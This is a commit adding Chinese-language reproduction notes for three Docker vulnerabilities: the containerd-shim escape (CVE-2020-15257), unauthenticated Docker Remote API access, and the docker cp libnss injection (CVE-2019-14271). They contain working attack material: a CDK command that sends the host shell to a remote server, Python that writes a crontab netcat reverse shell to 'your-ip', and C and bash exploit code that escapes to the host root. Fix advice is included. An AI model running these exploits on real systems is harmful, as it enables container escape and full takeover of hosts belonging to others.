add Docker exp

2022-01-13 17:42:46 +08:00 · 2022-01-13 17:42:46 +08:00 · 1495858e92
commit 1495858e92
parent ac93a247a1
7 changed files with 291 additions and 0 deletions
--- a/(CVE-2020-15257)复现/Docker
+++ b/(CVE-2020-15257)复现/Docker
@ -0,0 +1,66 @@
 # Docker 容器逃逸漏洞 (CVE-2020-15257)复现
 ## 漏洞概述
 `containerd`是行业标准的容器运行时，可作为`Linux`和`Windows`的守护程序使用。在版本`1.3.9`和`1.4.3`之前的容器中，容器填充的`API`不正确地暴露给主机网络容器。填充程序的`API`套接字的访问控制验证了连接过程的有效`UID`为0，但没有以其他方式限制对抽象`Unix`域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器（有效`UID`为0，但特权降低）导致新进程以提升的特权运行。
 ## 影响版本
 	containerd < 1.4.3
 	containerd < 1.3.9
 ## 环境搭建
 安装有漏洞的`containerd`版本
 这里我使用的版本是`1.2.10`
 ![640](./resource/Docker 容器逃逸漏洞 (CVE-2020-15257)复现/media/640.png)
 ## 漏洞复现
 通过`--net=host` 作为启动参数来运行一个容器：
 ```shell
 docker run -it --net=host ubuntu:18.04 /bin/bash
 ```
 接着在容器内执行
 ```shell
 cat /proc/net/unix|grep -a "containerd-shim"
 ```
 可看到抽象命名空间`Unix`域套接字
 ![641](./resource/Docker 容器逃逸漏洞 (CVE-2020-15257)复现/media/641.png)
 Poc地址
 > https://github.com/Xyntax/CDK/releases/tag/0.1.6
 这里为了方便行事，我们下载解压直接把`cdk_linux_amd64`文件拷贝到容器里
 ```shell
 docker cp cdk_linux_amd64 b7bd2b523d72:/tmp
 ```
 ![642](./resource/Docker 容器逃逸漏洞 (CVE-2020-15257)复现/media/642.png)
 ![643](./resource/Docker 容器逃逸漏洞 (CVE-2020-15257)复现/media/643.png)
 在容器中执行`exp`，自动搜索可用的`socket`并反弹宿主机的`shell`到远端服务器，完成逃逸
 ```shell
 ./cdk_linux_amd64 run shim-pwn 192.168.1.102 6666
 ```
 ![644](./resource/Docker 容器逃逸漏洞 (CVE-2020-15257)复现/media/644.png)
 ## 修复建议
 升级  `containerd` 至最新版本。
 ## 参考
 > https://mp.weixin.qq.com/s/ieY90noArcObNgxyV2-sGA
--- a/未授权访问/Docker
+++ b/未授权访问/Docker
@ -0,0 +1,99 @@
 Docker 未授权访问
 =================
 一、漏洞简介
 ------------
 #### 1. 基础介绍
 http://www.loner.fm/drops/\#\#!/drops/1203.%E6%96%B0%E5%A7%BF%E5%8A%BF%E4%B9%8BDocker%20Remote%20API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%88%A9%E7%94%A8
 docker swarm 是一个将docker集群变成单一虚拟的docker
 host工具，使用标准的Docker
 API，能够方便docker集群的管理和扩展，由docker官方提供，具体的大家可以看官网介绍。
 漏洞发现的起因是，有一位同学在使用docker swarm的时候，发现了管理的docker
 节点上会开放一个TCP端口2375，绑定在0.0.0.0上，http访问会返回 404 page
 not found ，然后他研究了下，发现这是 Docker Remote
 API，可以执行docker命令，比如访问 http://host:2375/containers/json
 会返回服务器当前运行的 container列表，和在docker CLI上执行 docker ps
 的效果一样，其他操作比如创建/删除container，拉取image等操作也都可以通过API调用完成，然后他就开始吐槽了，这尼玛太不安全了。
 然后我想了想
 swarm是用来管理docker集群的，应该放在内网才对。问了之后发现，他是在公网上的几台机器上安装swarm的，并且2375端口的访问策略是开放的，所以可以直接访问。
 #### 2. 测试环境配置
 先关闭docker，然后开启：
    sudo service docker stop
    # 绑定Docker Remote Api在指定端口（这里是2375），可以自行测试。
    sudo docker daemon  -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
 参考API规范进行渗透：https://docs.docker.com/engine/reference/api/docker-remote-api-v1.23/
 操作Docker API可以使用python dockert api 完成。
 pip install docker-py
 API使用参考：https://docker-py.readthedocs.io/en/stable/api/\#\#client-api
 二、影响范围
 ------------
 三、复现过程
 ------------
 利用方法是，我们随意启动一个容器，并将宿主机的/etc目录挂载到容器中，便可以任意读写文件了。我们可以将命令写入crontab配置文件，进行反弹shell。
    import docker
    client = docker.DockerClient(base_url='http://your-ip:2375/')
    data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
 写入crontab文件，成功反弹shell：![](./resource/Docker未授权访问/media/rId26.png)
 #### python脚本
 https://github.com/ianxtianxt/docker\_api\_vul
 -   安装类库    `pip install -r requirements.txt`
 -   查看运行的容器    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375`
 -   查看所有的容器    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -a`
 -   查看所有镜像    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -l`
 -   查看端口映射    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -L`
 -   写计划任务（centos,redhat等,加-u参数用于ubuntu等）    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -C -i 镜像名 -H 反弹ip -P 反弹端口`    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -C -u -i 镜像名 -H 反弹ip -P 反弹端口`
 -   写sshkey(自行修改脚本的中公钥)    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -C -i 镜像名 -k`
 -   在容器中执行命令    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -e  "id" -I 容器id`
 -   删除容器    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -c -I 容器id`
 -   修改client api版本    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -v 1.22`
 -   查看服务端api版本    `python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -V`
 #### 3.3 其他的一些exp
 https://github.com/netxfly/docker-remote-api-exphttps://github.com/zer0yu/SomePoC/blob/master/Docker/Docker\_Remote\_API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.pyhttps://github.com/JnuSimba/MiscSecNotes/tree/master/Docker%E5%AE%89%E5%85%A8
 #### 4. 防护策略
 -   1.修改 Docker Remote API 服务默认参数。注意：该操作需要重启 Docker
    服务才能生效。
 -   2.修改 Docker 的启动参数：    定位到 DOCKER\_OPTS 中的
    tcp://0.0.0.0:2375，将0.0.0.0修改为127.0.0.1    或将默认端口 2375 改为自定义端口    为 Remote API 设置认证措施。参照 官方文档 配置 Rem
 -   3.注意：该操作需要重启 Docker 服务才能生效。    修改 Docker 服务运行账号。请以较低权限账号运行 Docker
    服务；另外，可以限制攻击者执行高危命令。
 -   4.注意：该操作需要重启 Docker 服务才能生效。    设置防火墙策略。如果正常业务中 API
    服务需要被其他服务器来访问，可以配置安全组策略或 iptables
    策略，仅允许指定的 IP 来访问 Docker 接口。
--- a/未授权访问/resource/Docker未授权访问/media/rId26.png
+++ b/未授权访问/resource/Docker未授权访问/media/rId26.png
--- a/copy漏洞/resource/(CVE-2019-14271)Dockercopy漏洞/media/rId25.png
+++ b/copy漏洞/resource/(CVE-2019-14271)Dockercopy漏洞/media/rId25.png
--- a/copy漏洞/resource/(CVE-2019-14271)Dockercopy漏洞/media/rId26.png
+++ b/copy漏洞/resource/(CVE-2019-14271)Dockercopy漏洞/media/rId26.png
--- a/copy漏洞/resource/(CVE-2019-14271)Dockercopy漏洞/media/rId29.png
+++ b/copy漏洞/resource/(CVE-2019-14271)Dockercopy漏洞/media/rId29.png
--- a/copy漏洞/（CVE-2019-14271）Docker
+++ b/copy漏洞/（CVE-2019-14271）Docker
@ -0,0 +1,126 @@
 （CVE-2019-14271）Docker copy漏洞
 =================================
 一、漏洞简介
 ------------
 二、漏洞影响
 ------------
 Docker 19.03.1
 三、复现过程
 ------------
 ### Docker cp
 Copy命令允许从容器、向容器中、或容器之间复制文件。语法与标准的unix
 cp命令非常相似。要从容器中复制/var/logs，语法是docker cp
 container\_name:/var/logs /some/host/path。
 从下图所示，要从容器中将文件复制出去，Docker使用了一个名为docker-tar的帮助进程。
 ![](./resource/(CVE-2019-14271)Dockercopy漏洞/media/rId25.png)
 图 1. 从容器中复制文件
 docker-tar是通过chroot到容器，将请求的文件或目录存档，然后将生成的tar文件传递给Docker
 daemon，然后由daemon提取到主机的目标目录中。
 注释：CHROOT就是Change
 Root，也就是改变程序执行时所参考的根目录位置。CHROOT可以增进系统的安全性，限制使用者能做的事。
 ![](./resource/(CVE-2019-14271)Dockercopy漏洞/media/rId26.png)
 图 2. docker-tar chroot到容器中
 Chroot主要是为了避免系统链接的问题，当主机进程尝试访问容器中的文件时就可能会引发系统链接问题。如果访问的文件中有系统链接，就会解析到host
 root。因此，攻击者控制的容器就可以尝试和诱使docker
 cp在主机而非容器上读写文件。去年有许多Docker和Podman相关的系统链接CVE漏洞。通过chroot到容器的root，docker-tar可以确保所有系统链接都可以高效地解析。
 但，chroot到容器然后从容器中复制文件可能会引发很严重的安全问题。
 ### CVE-2019-14271
 Docker是用Golang语言编写。有漏洞的Docker版本是用Go
 v1.11编译的。在该版本中，一些含有嵌入C代码（cgo）的包会在运行时动态加载共享的库。这些包包括net和os/user，都是docker-tar使用的，而且在运行时会加载多个libnss\_\*.so库。一般来说，库是从host文件系统加载的，但因为docker-tarchroot到了容器，因此会从容器文件系统中加载库。也就是说docker-tat会加载和执行来源于容器或由容器控制的代码。
 需要说明的是，除了chroot到容器文件系统外，docker-tar并没有被容器化。它是在host命名空间运行的，权限为root全新且不受限于cgroups或seccomp。因此，通过注入代码到docker-tar，恶意容器就可以获取host主机的完全root访问权限。
 可能的攻击场景有Docker用户从另一个Docker处复制文件：
 容器运行含有恶意libnss\_\*.so库的镜像
 容器中含有被攻击者替换的libnss\_\*.so库
 在这两种情况下，攻击者都可以获取主机上的root代码执行权限。
 ### 漏洞利用
 为利用该漏洞，研究人员需要先创建一个恶意libnss库。研究人员随意选择了libnss\_files.so文件，下载了库函数的源码，并在代码中加入了一个函数------run\_at\_link()。研究人员还为该函数定义了constructor属性。constructor属性表明run\_at\_link函数在进程加载时会作为库的初始化函数执行。也就是说，当Docker-tar进程动态加载恶意库时，run\_at\_link函数就会执行。下面是run\_at\_link的代码：
    #include ...
    #define ORIGINAL_LIBNSS "/original_libnss_files.so.2"
    #define LIBNSS_PATH "/lib/x86_64-linux-gnu/libnss_files.so.2"
    bool is_priviliged();
    __attribute__ ((constructor)) void run_at_link(void)
    {
         char * argv_break[2];
         if (!is_priviliged())
               return;
         rename(ORIGINAL_LIBNSS, LIBNSS_PATH);
         fprintf(log_fp, "switched back to the original libnss_file.so");
         if (!fork())
         {
               // Child runs breakout
               argv_break[0] = strdup("/breakout");
               argv_break[1] = NULL;
               execve("/breakout", argv_break, NULL);
         }
         else
               wait(NULL); // Wait for child
         return;
    }
    bool is_priviliged()
    {
         FILE * proc_file = fopen("/proc/self/exe", "r");
         if (proc_file != NULL)
         {
               fclose(proc_file);
               return false; // can open so /proc exists, not privileged
         }
         return true; // we're running in the context of docker-tar
    }
 查/proc目录完成的。如果run\_at\_link运行在docker-tar环境下，那么目录就是空的，因为procfs挂载在/proc上只存在于容器的mount命名空间。
 然后，run\_at\_link会用恶意libnss库替换原始库。这保证了漏洞利用运行的随后进程不会意外加载恶意版本，并触发run\_at\_link执行。
 为简化该漏洞利用，run\_at\_link会尝试在容器的/breakout路径下运行可执行文件。这样漏洞利用的其他部分就可以用bash写入，而非C语言。让逻辑的其他部分在run\_at\_link外，意味着在漏洞利用每次变化后无需重新编译恶意库，只需改变breakout二进制文件就可以了。
 ![](./resource/(CVE-2019-14271)Dockercopy漏洞/media/rId29.png)
 利用CVE-2019-14271打破Docker
 在该漏洞视频中，Docker用户会运行含有恶意libnss\_files.so的恶意镜像，然后尝试从容器中复制一些日志。镜像中的/breakout二进制文件是一个简单的bash脚步，会挂载host文件系统到/host\_fs的容器中，并将消息写入host的/evil目录。/breakout脚本代码如下：
    umount /host_fs && rm -rf /host_fs
    mkdir /host_fs
    mount -t proc none /proc     # mount the host's procfs over /proc
    cd /proc/1/root              # chdir to host's root
    mount --bind . /host_fs      # mount host root at /host_fs
    echo "Hello from within the container!" > /host_fs/evil
 四、参考链接
 ------------
 > https://xz.aliyun.com/t/6806